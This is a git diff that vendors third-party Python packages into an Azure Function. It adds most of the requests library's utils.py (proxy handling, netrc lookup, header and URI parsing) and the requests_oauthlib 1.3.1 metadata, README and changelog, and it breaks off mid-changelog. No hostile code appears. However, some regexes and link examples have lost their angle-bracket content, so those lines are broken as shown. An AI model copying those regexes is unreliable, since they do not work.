+def dict_to_sequence(d): + """Returns an internal sequence dictionary update.""" + + if hasattr(d, "items"): + d = d.items() + + return d + + +def super_len(o): + total_length = None + current_position = 0 + + if hasattr(o, "__len__"): + total_length = len(o) + + elif hasattr(o, "len"): + total_length = o.len + + elif hasattr(o, "fileno"): + try: + fileno = o.fileno() + except (io.UnsupportedOperation, AttributeError): + # AttributeError is a surprising exception, seeing as how we've just checked + # that `hasattr(o, 'fileno')`. It happens for objects obtained via + # `Tarfile.extractfile()`, per issue 5229. + pass + else: + total_length = os.fstat(fileno).st_size + + # Having used fstat to determine the file length, we need to + # confirm that this file was opened up in binary mode. + if "b" not in o.mode: + warnings.warn( + ( + "Requests has determined the content-length for this " + "request using the binary size of the file: however, the " + "file has been opened in text mode (i.e. without the 'b' " + "flag in the mode). This may lead to an incorrect " + "content-length. In Requests 3.0, support will be removed " + "for files in text mode." + ), + FileModeWarning, + ) + + if hasattr(o, "tell"): + try: + current_position = o.tell() + except OSError: + # This can happen in some weird situations, such as when the file + # is actually a special file descriptor like stdin. In this + # instance, we don't know what the length is, so set it to zero and + # let requests chunk it instead. + if total_length is not None: + current_position = total_length + else: + if hasattr(o, "seek") and total_length is None: + # StringIO and BytesIO have seek but no usable fileno + try: + # seek to end of file + o.seek(0, 2) + total_length = o.tell() + + # seek back to current position to support + # partially read file-like objects + o.seek(current_position or 0) + except OSError: + total_length = 0 + + if total_length is None: + total_length = 0 + + return max(0, total_length - current_position) + + +def get_netrc_auth(url, raise_errors=False): + """Returns the Requests tuple auth for a given url from netrc.""" + + netrc_file = os.environ.get("NETRC") + if netrc_file is not None: + netrc_locations = (netrc_file,) + else: + netrc_locations = (f"~/{f}" for f in NETRC_FILES) + + try: + from netrc import NetrcParseError, netrc + + netrc_path = None + + for f in netrc_locations: + try: + loc = os.path.expanduser(f) + except KeyError: + # os.path.expanduser can fail when $HOME is undefined and + # getpwuid fails. See https://bugs.python.org/issue20164 & + # https://github.com/psf/requests/issues/1846 + return + + if os.path.exists(loc): + netrc_path = loc + break + + # Abort early if there isn't one. + if netrc_path is None: + return + + ri = urlparse(url) + + # Strip port numbers from netloc. This weird `if...encode`` dance is + # used for Python 3.2, which doesn't support unicode literals. + splitstr = b":" + if isinstance(url, str): + splitstr = splitstr.decode("ascii") + host = ri.netloc.split(splitstr)[0] + + try: + _netrc = netrc(netrc_path).authenticators(host) + if _netrc: + # Return with login / password + login_i = 0 if _netrc[0] else 1 + return (_netrc[login_i], _netrc[2]) + except (NetrcParseError, OSError): + # If there was a parsing error or a permissions issue reading the file, + # we'll just skip netrc auth unless explicitly asked to raise errors. + if raise_errors: + raise + + # App Engine hackiness. + except (ImportError, AttributeError): + pass + + +def guess_filename(obj): + """Tries to guess the filename of the given object.""" + name = getattr(obj, "name", None) + if name and isinstance(name, basestring) and name[0] != "<" and name[-1] != ">": + return os.path.basename(name) + + +def extract_zipped_paths(path): + """Replace nonexistent paths that look like they refer to a member of a zip + archive with the location of an extracted copy of the target, or else + just return the provided path unchanged. + """ + if os.path.exists(path): + # this is already a valid path, no need to do anything further + return path + + # find the first valid part of the provided path and treat that as a zip archive + # assume the rest of the path is the name of a member in the archive + archive, member = os.path.split(path) + while archive and not os.path.exists(archive): + archive, prefix = os.path.split(archive) + if not prefix: + # If we don't check for an empty prefix after the split (in other words, archive remains unchanged after the split), + # we _can_ end up in an infinite loop on a rare corner case affecting a small number of users + break + member = "/".join([prefix, member]) + + if not zipfile.is_zipfile(archive): + return path + + zip_file = zipfile.ZipFile(archive) + if member not in zip_file.namelist(): + return path + + # we have a valid zip archive and a valid member of that archive + tmp = tempfile.gettempdir() + extracted_path = os.path.join(tmp, member.split("/")[-1]) + if not os.path.exists(extracted_path): + # use read + write to avoid the creating nested folders, we only want the file, avoids mkdir racing condition + with atomic_open(extracted_path) as file_handler: + file_handler.write(zip_file.read(member)) + return extracted_path + + +@contextlib.contextmanager +def atomic_open(filename): + """Write a file to the disk in an atomic fashion""" + tmp_descriptor, tmp_name = tempfile.mkstemp(dir=os.path.dirname(filename)) + try: + with os.fdopen(tmp_descriptor, "wb") as tmp_handler: + yield tmp_handler + os.replace(tmp_name, filename) + except BaseException: + os.remove(tmp_name) + raise + + +def from_key_val_list(value): + """Take an object and test to see if it can be represented as a + dictionary. Unless it can not be represented as such, return an + OrderedDict, e.g., + + :: + + >>> from_key_val_list([('key', 'val')]) + OrderedDict([('key', 'val')]) + >>> from_key_val_list('string') + Traceback (most recent call last): + ... + ValueError: cannot encode objects that are not 2-tuples + >>> from_key_val_list({'key': 'val'}) + OrderedDict([('key', 'val')]) + + :rtype: OrderedDict + """ + if value is None: + return None + + if isinstance(value, (str, bytes, bool, int)): + raise ValueError("cannot encode objects that are not 2-tuples") + + return OrderedDict(value) + + +def to_key_val_list(value): + """Take an object and test to see if it can be represented as a + dictionary. If it can be, return a list of tuples, e.g., + + :: + + >>> to_key_val_list([('key', 'val')]) + [('key', 'val')] + >>> to_key_val_list({'key': 'val'}) + [('key', 'val')] + >>> to_key_val_list('string') + Traceback (most recent call last): + ... + ValueError: cannot encode objects that are not 2-tuples + + :rtype: list + """ + if value is None: + return None + + if isinstance(value, (str, bytes, bool, int)): + raise ValueError("cannot encode objects that are not 2-tuples") + + if isinstance(value, Mapping): + value = value.items() + + return list(value) + + +# From mitsuhiko/werkzeug (used with permission). +def parse_list_header(value): + """Parse lists as described by RFC 2068 Section 2. + + In particular, parse comma-separated lists where the elements of + the list may include quoted-strings. A quoted-string could + contain a comma. A non-quoted string could have quotes in the + middle. Quotes are removed automatically after parsing. + + It basically works like :func:`parse_set_header` just that items + may appear multiple times and case sensitivity is preserved. + + The return value is a standard :class:`list`: + + >>> parse_list_header('token, "quoted value"') + ['token', 'quoted value'] + + To create a header from the :class:`list` again, use the + :func:`dump_header` function. + + :param value: a string with a list header. + :return: :class:`list` + :rtype: list + """ + result = [] + for item in _parse_list_header(value): + if item[:1] == item[-1:] == '"': + item = unquote_header_value(item[1:-1]) + result.append(item) + return result + + +# From mitsuhiko/werkzeug (used with permission). +def parse_dict_header(value): + """Parse lists of key, value pairs as described by RFC 2068 Section 2 and + convert them into a python dict: + + >>> d = parse_dict_header('foo="is a fish", bar="as well"') + >>> type(d) is dict + True + >>> sorted(d.items()) + [('bar', 'as well'), ('foo', 'is a fish')] + + If there is no value for a key it will be `None`: + + >>> parse_dict_header('key_without_value') + {'key_without_value': None} + + To create a header from the :class:`dict` again, use the + :func:`dump_header` function. + + :param value: a string with a dict header. + :return: :class:`dict` + :rtype: dict + """ + result = {} + for item in _parse_list_header(value): + if "=" not in item: + result[item] = None + continue + name, value = item.split("=", 1) + if value[:1] == value[-1:] == '"': + value = unquote_header_value(value[1:-1]) + result[name] = value + return result + + +# From mitsuhiko/werkzeug (used with permission). +def unquote_header_value(value, is_filename=False): + r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). + This does not use the real unquoting but what browsers are actually + using for quoting. + + :param value: the header value to unquote. + :rtype: str + """ + if value and value[0] == value[-1] == '"': + # this is not the real unquoting, but fixing this so that the + # RFC is met will result in bugs with internet explorer and + # probably some other browsers as well. IE for example is + # uploading files with "C:\foo\bar.txt" as filename + value = value[1:-1] + + # if this is a filename and the starting characters look like + # a UNC path, then just return the value without quotes. Using the + # replace sequence below on a UNC path has the effect of turning + # the leading double slash into a single slash and then + # _fix_ie_filename() doesn't work correctly. See #458. + if not is_filename or value[:2] != "\\\\": + return value.replace("\\\\", "\\").replace('\\"', '"') + return value + + +def dict_from_cookiejar(cj): + """Returns a key/value dictionary from a CookieJar. + + :param cj: CookieJar object to extract cookies from. + :rtype: dict + """ + + cookie_dict = {} + + for cookie in cj: + cookie_dict[cookie.name] = cookie.value + + return cookie_dict + + +def add_dict_to_cookiejar(cj, cookie_dict): + """Returns a CookieJar from a key/value dictionary. + + :param cj: CookieJar to insert cookies into. + :param cookie_dict: Dict of key/values to insert into CookieJar. + :rtype: CookieJar + """ + + return cookiejar_from_dict(cookie_dict, cj) + + +def get_encodings_from_content(content): + """Returns encodings from given content string. + + :param content: bytestring to extract encodings from. + """ + warnings.warn( + ( + "In requests 3.0, get_encodings_from_content will be removed. For " + "more information, please see the discussion on issue #2266. (This" + " warning should only appear once.)" + ), + DeprecationWarning, + ) + + charset_re = re.compile(r']', flags=re.I) + pragma_re = re.compile(r']', flags=re.I) + xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]') + + return ( + charset_re.findall(content) + + pragma_re.findall(content) + + xml_re.findall(content) + ) + + +def _parse_content_type_header(header): + """Returns content type and parameters from given header + + :param header: string + :return: tuple containing content type and dictionary of + parameters + """ + + tokens = header.split(";") + content_type, params = tokens[0].strip(), tokens[1:] + params_dict = {} + items_to_strip = "\"' " + + for param in params: + param = param.strip() + if param: + key, value = param, True + index_of_equals = param.find("=") + if index_of_equals != -1: + key = param[:index_of_equals].strip(items_to_strip) + value = param[index_of_equals + 1 :].strip(items_to_strip) + params_dict[key.lower()] = value + return content_type, params_dict + + +def get_encoding_from_headers(headers): + """Returns encodings from given HTTP Header Dict. + + :param headers: dictionary to extract encoding from. + :rtype: str + """ + + content_type = headers.get("content-type") + + if not content_type: + return None + + content_type, params = _parse_content_type_header(content_type) + + if "charset" in params: + return params["charset"].strip("'\"") + + if "text" in content_type: + return "ISO-8859-1" + + if "application/json" in content_type: + # Assume UTF-8 based on RFC 4627: https://www.ietf.org/rfc/rfc4627.txt since the charset was unset + return "utf-8" + + +def stream_decode_response_unicode(iterator, r): + """Stream decodes an iterator.""" + + if r.encoding is None: + yield from iterator + return + + decoder = codecs.getincrementaldecoder(r.encoding)(errors="replace") + for chunk in iterator: + rv = decoder.decode(chunk) + if rv: + yield rv + rv = decoder.decode(b"", final=True) + if rv: + yield rv + + +def iter_slices(string, slice_length): + """Iterate over slices of a string.""" + pos = 0 + if slice_length is None or slice_length <= 0: + slice_length = len(string) + while pos < len(string): + yield string[pos : pos + slice_length] + pos += slice_length + + +def get_unicode_from_response(r): + """Returns the requested content back in unicode. + + :param r: Response object to get unicode content from. + + Tried: + + 1. charset from content-type + 2. fall back and replace all unicode characters + + :rtype: str + """ + warnings.warn( + ( + "In requests 3.0, get_unicode_from_response will be removed. For " + "more information, please see the discussion on issue #2266. (This" + " warning should only appear once.)" + ), + DeprecationWarning, + ) + + tried_encodings = [] + + # Try charset from content-type + encoding = get_encoding_from_headers(r.headers) + + if encoding: + try: + return str(r.content, encoding) + except UnicodeError: + tried_encodings.append(encoding) + + # Fall back: + try: + return str(r.content, encoding, errors="replace") + except TypeError: + return r.content + + +# The unreserved URI characters (RFC 3986) +UNRESERVED_SET = frozenset( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~" +) + + +def unquote_unreserved(uri): + """Un-escape any percent-escape sequences in a URI that are unreserved + characters. This leaves all reserved, illegal and non-ASCII bytes encoded. + + :rtype: str + """ + parts = uri.split("%") + for i in range(1, len(parts)): + h = parts[i][0:2] + if len(h) == 2 and h.isalnum(): + try: + c = chr(int(h, 16)) + except ValueError: + raise InvalidURL(f"Invalid percent-escape sequence: '{h}'") + + if c in UNRESERVED_SET: + parts[i] = c + parts[i][2:] + else: + parts[i] = f"%{parts[i]}" + else: + parts[i] = f"%{parts[i]}" + return "".join(parts) + + +def requote_uri(uri): + """Re-quote the given URI. + + This function passes the given URI through an unquote/quote cycle to + ensure that it is fully and consistently quoted. + + :rtype: str + """ + safe_with_percent = "!#$%&'()*+,/:;=?@[]~" + safe_without_percent = "!#$&'()*+,/:;=?@[]~" + try: + # Unquote only the unreserved characters + # Then quote only illegal characters (do not quote reserved, + # unreserved, or '%') + return quote(unquote_unreserved(uri), safe=safe_with_percent) + except InvalidURL: + # We couldn't unquote the given URI, so let's try quoting it, but + # there may be unquoted '%'s in the URI. We need to make sure they're + # properly quoted so they do not cause issues elsewhere. + return quote(uri, safe=safe_without_percent) + + +def address_in_network(ip, net): + """This function allows you to check if an IP belongs to a network subnet + + Example: returns True if ip = 192.168.1.1 and net = 192.168.1.0/24 + returns False if ip = 192.168.1.1 and net = 192.168.100.0/24 + + :rtype: bool + """ + ipaddr = struct.unpack("=L", socket.inet_aton(ip))[0] + netaddr, bits = net.split("/") + netmask = struct.unpack("=L", socket.inet_aton(dotted_netmask(int(bits))))[0] + network = struct.unpack("=L", socket.inet_aton(netaddr))[0] & netmask + return (ipaddr & netmask) == (network & netmask) + + +def dotted_netmask(mask): + """Converts mask from /xx format to xxx.xxx.xxx.xxx + + Example: if mask is 24 function returns 255.255.255.0 + + :rtype: str + """ + bits = 0xFFFFFFFF ^ (1 << 32 - mask) - 1 + return socket.inet_ntoa(struct.pack(">I", bits)) + + +def is_ipv4_address(string_ip): + """ + :rtype: bool + """ + try: + socket.inet_aton(string_ip) + except OSError: + return False + return True + + +def is_valid_cidr(string_network): + """ + Very simple check of the cidr format in no_proxy variable. + + :rtype: bool + """ + if string_network.count("/") == 1: + try: + mask = int(string_network.split("/")[1]) + except ValueError: + return False + + if mask < 1 or mask > 32: + return False + + try: + socket.inet_aton(string_network.split("/")[0]) + except OSError: + return False + else: + return False + return True + + +@contextlib.contextmanager +def set_environ(env_name, value): + """Set the environment variable 'env_name' to 'value' + + Save previous value, yield, and then restore the previous value stored in + the environment variable 'env_name'. + + If 'value' is None, do nothing""" + value_changed = value is not None + if value_changed: + old_value = os.environ.get(env_name) + os.environ[env_name] = value + try: + yield + finally: + if value_changed: + if old_value is None: + del os.environ[env_name] + else: + os.environ[env_name] = old_value + + +def should_bypass_proxies(url, no_proxy): + """ + Returns whether we should bypass proxies or not. + + :rtype: bool + """ + # Prioritize lowercase environment variables over uppercase + # to keep a consistent behaviour with other http projects (curl, wget). + def get_proxy(key): + return os.environ.get(key) or os.environ.get(key.upper()) + + # First check whether no_proxy is defined. If it is, check that the URL + # we're getting isn't in the no_proxy list. + no_proxy_arg = no_proxy + if no_proxy is None: + no_proxy = get_proxy("no_proxy") + parsed = urlparse(url) + + if parsed.hostname is None: + # URLs don't always have hostnames, e.g. file:/// urls. + return True + + if no_proxy: + # We need to check whether we match here. We need to see if we match + # the end of the hostname, both with and without the port. + no_proxy = (host for host in no_proxy.replace(" ", "").split(",") if host) + + if is_ipv4_address(parsed.hostname): + for proxy_ip in no_proxy: + if is_valid_cidr(proxy_ip): + if address_in_network(parsed.hostname, proxy_ip): + return True + elif parsed.hostname == proxy_ip: + # If no_proxy ip was defined in plain IP notation instead of cidr notation & + # matches the IP of the index + return True + else: + host_with_port = parsed.hostname + if parsed.port: + host_with_port += f":{parsed.port}" + + for host in no_proxy: + if parsed.hostname.endswith(host) or host_with_port.endswith(host): + # The URL does match something in no_proxy, so we don't want + # to apply the proxies on this URL. + return True + + with set_environ("no_proxy", no_proxy_arg): + # parsed.hostname can be `None` in cases such as a file URI. + try: + bypass = proxy_bypass(parsed.hostname) + except (TypeError, socket.gaierror): + bypass = False + + if bypass: + return True + + return False + + +def get_environ_proxies(url, no_proxy=None): + """ + Return a dict of environment proxies. + + :rtype: dict + """ + if should_bypass_proxies(url, no_proxy=no_proxy): + return {} + else: + return getproxies() + + +def select_proxy(url, proxies): + """Select a proxy for the url, if applicable. + + :param url: The url being for the request + :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs + """ + proxies = proxies or {} + urlparts = urlparse(url) + if urlparts.hostname is None: + return proxies.get(urlparts.scheme, proxies.get("all")) + + proxy_keys = [ + urlparts.scheme + "://" + urlparts.hostname, + urlparts.scheme, + "all://" + urlparts.hostname, + "all", + ] + proxy = None + for proxy_key in proxy_keys: + if proxy_key in proxies: + proxy = proxies[proxy_key] + break + + return proxy + + +def resolve_proxies(request, proxies, trust_env=True): + """This method takes proxy information from a request and configuration + input to resolve a mapping of target proxies. This will consider settings + such a NO_PROXY to strip proxy configurations. + + :param request: Request or PreparedRequest + :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs + :param trust_env: Boolean declaring whether to trust environment configs + + :rtype: dict + """ + proxies = proxies if proxies is not None else {} + url = request.url + scheme = urlparse(url).scheme + no_proxy = proxies.get("no_proxy") + new_proxies = proxies.copy() + + if trust_env and not should_bypass_proxies(url, no_proxy=no_proxy): + environ_proxies = get_environ_proxies(url, no_proxy=no_proxy) + + proxy = environ_proxies.get(scheme, environ_proxies.get("all")) + + if proxy: + new_proxies.setdefault(scheme, proxy) + return new_proxies + + +def default_user_agent(name="python-requests"): + """ + Return a string representing the default user agent. + + :rtype: str + """ + return f"{name}/{__version__}" + + +def default_headers(): + """ + :rtype: requests.structures.CaseInsensitiveDict + """ + return CaseInsensitiveDict( + { + "User-Agent": default_user_agent(), + "Accept-Encoding": DEFAULT_ACCEPT_ENCODING, + "Accept": "*/*", + "Connection": "keep-alive", + } + ) + + +def parse_header_links(value): + """Return a list of parsed link headers proxies. + + i.e. Link: ; rel=front; type="image/jpeg",; rel=back;type="image/jpeg" + + :rtype: list + """ + + links = [] + + replace_chars = " '\"" + + value = value.strip(replace_chars) + if not value: + return links + + for val in re.split(", *<", value): + try: + url, params = val.split(";", 1) + except ValueError: + url, params = val, "" + + link = {"url": url.strip("<> '\"")} + + for param in params.split(";"): + try: + key, value = param.split("=") + except ValueError: + break + + link[key.strip(replace_chars)] = value.strip(replace_chars) + + links.append(link) + + return links + + +# Null bytes; no need to recreate these on each call to guess_json_utf +_null = "\x00".encode("ascii") # encoding to ASCII for Python 3 +_null2 = _null * 2 +_null3 = _null * 3 + + +def guess_json_utf(data): + """ + :rtype: str + """ + # JSON always starts with two ASCII characters, so detection is as + # easy as counting the nulls and from their location and count + # determine the encoding. Also detect a BOM, if present. + sample = data[:4] + if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE): + return "utf-32" # BOM included + if sample[:3] == codecs.BOM_UTF8: + return "utf-8-sig" # BOM included, MS style (discouraged) + if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE): + return "utf-16" # BOM included + nullcount = sample.count(_null) + if nullcount == 0: + return "utf-8" + if nullcount == 2: + if sample[::2] == _null2: # 1st and 3rd are null + return "utf-16-be" + if sample[1::2] == _null2: # 2nd and 4th are null + return "utf-16-le" + # Did not detect 2 valid UTF-16 ascii-range characters + if nullcount == 3: + if sample[:3] == _null3: + return "utf-32-be" + if sample[1:] == _null3: + return "utf-32-le" + # Did not detect a valid UTF-32 ascii-range character + return None + + +def prepend_scheme_if_needed(url, new_scheme): + """Given a URL that may or may not have a scheme, prepend the given scheme. + Does not replace a present scheme with the one provided as an argument. + + :rtype: str + """ + parsed = parse_url(url) + scheme, auth, host, port, path, query, fragment = parsed + + # A defect in urlparse determines that there isn't a netloc present in some + # urls. We previously assumed parsing was overly cautious, and swapped the + # netloc and path. Due to a lack of tests on the original defect, this is + # maintained with parse_url for backwards compatibility. + netloc = parsed.netloc + if not netloc: + netloc, path = path, netloc + + if auth: + # parse_url doesn't provide the netloc with auth + # so we'll add it ourselves. + netloc = "@".join([auth, netloc]) + if scheme is None: + scheme = new_scheme + if path is None: + path = "" + + return urlunparse((scheme, netloc, path, "", query, fragment)) + + +def get_auth_from_url(url): + """Given a url with authentication components, extract them into a tuple of + username,password. + + :rtype: (str,str) + """ + parsed = urlparse(url) + + try: + auth = (unquote(parsed.username), unquote(parsed.password)) + except (AttributeError, TypeError): + auth = ("", "") + + return auth + + +def check_header_validity(header): + """Verifies that header parts don't contain leading whitespace + reserved characters, or return characters. + + :param header: tuple, in the format (name, value). + """ + name, value = header + + for part in header: + if type(part) not in HEADER_VALIDATORS: + raise InvalidHeader( + f"Header part ({part!r}) from {{{name!r}: {value!r}}} must be " + f"of type str or bytes, not {type(part)}" + ) + + _validate_header_part(name, "name", HEADER_VALIDATORS[type(name)][0]) + _validate_header_part(value, "value", HEADER_VALIDATORS[type(value)][1]) + + +def _validate_header_part(header_part, header_kind, validator): + if not validator.match(header_part): + raise InvalidHeader( + f"Invalid leading whitespace, reserved character(s), or return" + f"character(s) in header {header_kind}: {header_part!r}" + ) + + +def urldefragauth(url): + """ + Given a url remove the fragment and the authentication part. + + :rtype: str + """ + scheme, netloc, path, params, query, fragment = urlparse(url) + + # see func:`prepend_scheme_if_needed` + if not netloc: + netloc, path = path, netloc + + netloc = netloc.rsplit("@", 1)[-1] + + return urlunparse((scheme, netloc, path, params, query, "")) + + +def rewind_body(prepared_request): + """Move file pointer back to its recorded starting position + so it can be read again on redirect. + """ + body_seek = getattr(prepared_request.body, "seek", None) + if body_seek is not None and isinstance( + prepared_request._body_position, integer_types + ): + try: + body_seek(prepared_request._body_position) + except OSError: + raise UnrewindableBodyError( + "An error occurred when rewinding request body for redirect." + ) + else: + raise UnrewindableBodyError("Unable to rewind request body for redirect.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE new file mode 100644 index 0000000..7fff981 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/LICENSE @@ -0,0 +1,15 @@ +ISC License + +Copyright (c) 2014 Kenneth Reitz. + +Permission to use, copy, modify, and/or distribute this software for any +purpose with or without fee is hereby granted, provided that the above +copyright notice and this permission notice appear in all copies. + +THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA new file mode 100644 index 0000000..dcc7c91 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/METADATA @@ -0,0 +1,245 @@ +Metadata-Version: 2.1 +Name: requests-oauthlib +Version: 1.3.1 +Summary: OAuthlib authentication support for Requests. +Home-page: https://github.com/requests/requests-oauthlib +Author: Kenneth Reitz +Author-email: me@kennethreitz.com +License: ISC +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Natural Language :: English +Classifier: License :: OSI Approved :: BSD License +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.4 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.* +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: oauthlib (>=3.0.0) +Requires-Dist: requests (>=2.0.0) +Provides-Extra: rsa +Requires-Dist: oauthlib[signedtoken] (>=3.0.0) ; extra == 'rsa' + +Requests-OAuthlib |build-status| |coverage-status| |docs| +========================================================= + +This project provides first-class OAuth library support for `Requests `_. + +The OAuth 1 workflow +-------------------- + +OAuth 1 can seem overly complicated and it sure has its quirks. Luckily, +requests_oauthlib hides most of these and let you focus at the task at hand. + +Accessing protected resources using requests_oauthlib is as simple as: + +.. code-block:: pycon + + >>> from requests_oauthlib import OAuth1Session + >>> twitter = OAuth1Session('client_key', + client_secret='client_secret', + resource_owner_key='resource_owner_key', + resource_owner_secret='resource_owner_secret') + >>> url = 'https://api.twitter.com/1/account/settings.json' + >>> r = twitter.get(url) + +Before accessing resources you will need to obtain a few credentials from your +provider (e.g. Twitter) and authorization from the user for whom you wish to +retrieve resources for. You can read all about this in the full +`OAuth 1 workflow guide on RTD `_. + +The OAuth 2 workflow +-------------------- + +OAuth 2 is generally simpler than OAuth 1 but comes in more flavours. The most +common being the Authorization Code Grant, also known as the WebApplication +flow. + +Fetching a protected resource after obtaining an access token can be extremely +simple. However, before accessing resources you will need to obtain a few +credentials from your provider (e.g. Google) and authorization from the user +for whom you wish to retrieve resources for. You can read all about this in the +full `OAuth 2 workflow guide on RTD `_. + +Installation +------------- + +To install requests and requests_oauthlib you can use pip: + +.. code-block:: bash + + $ pip install requests requests_oauthlib + +.. |build-status| image:: https://github.com/requests/requests-oauthlib/actions/workflows/run-tests.yml/badge.svg + :target: https://github.com/requests/requests-oauthlib/actions +.. |coverage-status| image:: https://img.shields.io/coveralls/requests/requests-oauthlib.svg + :target: https://coveralls.io/r/requests/requests-oauthlib +.. |docs| image:: https://readthedocs.org/projects/requests-oauthlib/badge/ + :alt: Documentation Status + :scale: 100% + :target: https://requests-oauthlib.readthedocs.io/ + + +History +------- + +v1.3.1 (21 January 2022) +++++++++++++++++++++++++ + +- Add initial support for OAuth Mutual TLS (draft-ietf-oauth-mtls) +- Add eBay compliance fix +- Add Spotify OAuth 2 Tutorial +- Add support for python 3.8, 3.9 +- Fixed LinkedIn Compliance Fixes +- Fixed ReadTheDocs Documentation and sphinx errors +- Moved pipeline to GitHub Actions + +v1.3.0 (6 November 2019) +++++++++++++++++++++++++ + +- Instagram compliance fix +- Added ``force_querystring`` argument to fetch_token() method on OAuth2Session + +v1.2.0 (14 January 2019) +++++++++++++++++++++++++ + +- This project now depends on OAuthlib 3.0.0 and above. It does **not** support + versions of OAuthlib before 3.0.0. +- Updated oauth2 tests to use 'sess' for an OAuth2Session instance instead of `auth` + because OAuth2Session objects and methods acceept an `auth` paramether which is + typically an instance of `requests.auth.HTTPBasicAuth` +- `OAuth2Session.fetch_token` previously tried to guess how and where to provide + "client" and "user" credentials incorrectly. This was incompatible with some + OAuth servers and incompatible with breaking changes in oauthlib that seek to + correctly provide the `client_id`. The older implementation also did not raise + the correct exceptions when username and password are not present on Legacy + clients. +- Avoid automatic netrc authentication for OAuth2Session. + +v1.1.0 (9 January 2019) ++++++++++++++++++++++++ + +- Adjusted version specifier for ``oauthlib`` dependency: this project is + not yet compatible with ``oauthlib`` 3.0.0. +- Dropped dependency on ``nose``. +- Minor changes to clean up the code and make it more readable/maintainable. + +v1.0.0 (4 June 2018) +++++++++++++++++++++ + +- **Removed support for Python 2.6 and Python 3.3.** + This project now supports Python 2.7, and Python 3.4 and above. +- Added several examples to the documentation. +- Added plentymarkets compliance fix. +- Added a ``token`` property to OAuth1Session, to match the corresponding + ``token`` property on OAuth2Session. + +v0.8.0 (14 February 2017) ++++++++++++++++++++++++++ + +- Added Fitbit compliance fix. +- Fixed an issue where newlines in the response body for the access token + request would cause errors when trying to extract the token. +- Fixed an issue introduced in v0.7.0 where users passing ``auth`` to several + methods would encounter conflicts with the ``client_id`` and + ``client_secret``-derived auth. The user-supplied ``auth`` argument is now + used in preference to those options. + +v0.7.0 (22 September 2016) +++++++++++++++++++++++++++ + +- Allowed ``OAuth2Session.request`` to take the ``client_id`` and + ``client_secret`` parameters for the purposes of automatic token refresh, + which may need them. + +v0.6.2 (12 July 2016) ++++++++++++++++++++++ + +- Use ``client_id`` and ``client_secret`` for the Authorization header if + provided. +- Allow explicit bypass of the Authorization header by setting ``auth=False``. +- Pass through the ``proxies`` kwarg when refreshing tokens. +- Miscellaneous cleanups. + +v0.6.1 (19 February 2016) ++++++++++++++++++++++++++ + +- Fixed a bug when sending authorization in headers with no username and + password present. +- Make sure we clear the session token before obtaining a new one. +- Some improvements to the Slack compliance fix. +- Avoid timing problems around token refresh. +- Allow passing arbitrary arguments to requests when calling + ``fetch_request_token`` and ``fetch_access_token``. + +v0.6.0 (14 December 2015) ++++++++++++++++++++++++++ + +- Add compliance fix for Slack. +- Add compliance fix for Mailchimp. +- ``TokenRequestDenied`` exceptions now carry the entire response, not just the + status code. +- Pass through keyword arguments when refreshing tokens automatically. +- Send authorization in headers, not just body, to maximize compatibility. +- More getters/setters available for OAuth2 session client values. +- Allow sending custom headers when refreshing tokens, and set some defaults. + + +v0.5.0 (4 May 2015) ++++++++++++++++++++ +- Fix ``TypeError`` being raised instead of ``TokenMissing`` error. +- Raise requests exceptions on 4XX and 5XX responses in the OAuth2 flow. +- Avoid ``AttributeError`` when initializing the ``OAuth2Session`` class + without complete client information. + +v0.4.2 (16 October 2014) +++++++++++++++++++++++++ +- New ``authorized`` property on OAuth1Session and OAuth2Session, which allows + you to easily determine if the session is already authorized with OAuth tokens + or not. +- New ``TokenMissing`` and ``VerifierMissing`` exception classes for OAuth1Session: + this will make it easier to catch and identify these exceptions. + +v0.4.1 (6 June 2014) +++++++++++++++++++++ +- New install target ``[rsa]`` for people using 